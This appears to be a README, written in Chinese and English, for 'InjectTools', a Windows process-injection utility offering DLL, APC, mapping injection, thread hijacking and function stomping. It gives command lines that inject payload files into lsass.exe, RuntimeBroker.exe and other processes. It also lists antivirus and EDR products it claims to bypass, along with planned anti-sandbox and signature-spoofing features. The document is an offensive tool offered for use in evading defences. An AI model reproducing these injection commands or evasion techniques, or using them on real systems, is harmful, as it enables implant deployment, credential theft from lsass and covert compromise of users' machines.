一款集成了DLL-Session0注入,APC注入,映射注入,线程劫持,函数踩踏自提权的工具。 //开源无🐎🐎,relax!!
Function : DLL-Inject ,APC-Inject , Mapping Inject , Thread HiJacking , Function Stomping
Example:
InjectTools.exe 你要注入的程序 DLL完整路径
InjectTools.exe lsass.exe C:\Users\ASUS\Desktop\artifact_x64.dll
example:
InjectTools.exe 你要注入的程序 DLL完整路径
InjectTools.exe lsass.exe C:\Users\users\Desktop\artifact_x64.dll
example: //这里建议RuntimeBroker
InjectTools.exe 你要注入的程序 BIN完整路径
InjectTools.exe RuntimeBroker.exe C:\Users\users\Desktop\artifact_x64.bin
example:
InjectTools.exe 你要注入的程序 BIN完整路径
InjectTools.exe OneDrive.exe C:\Users\users\Desktop\artifact_x64.bin
InjectTools.exe 目标程序 BIN完整路径 目标程序加载的DLL 要踩踏的函数
InjectTools.exe Notepad.exe C:\Users\users\Desktop\artifact_x64.bin User32.dll GetFocus
VT
微步
360沙箱
McAfee EDR + FireEye Combined !!
火绒
Windows Defender 实体机&&虚拟机
360全家桶 || 现在QVM杀疯了 , 不白加黑基本上不可能 , Failed :(
ESET
卡巴斯基
赛门铁克
- [√] 普通动态调用静态过大部分杀软
- [√] ICON(360),详细信息,签名
- [√] 简单反沙箱
- [√] 新的模块功能引入
- 实现文件加解密操作
- NT动态调用
- PEB寻址
- ....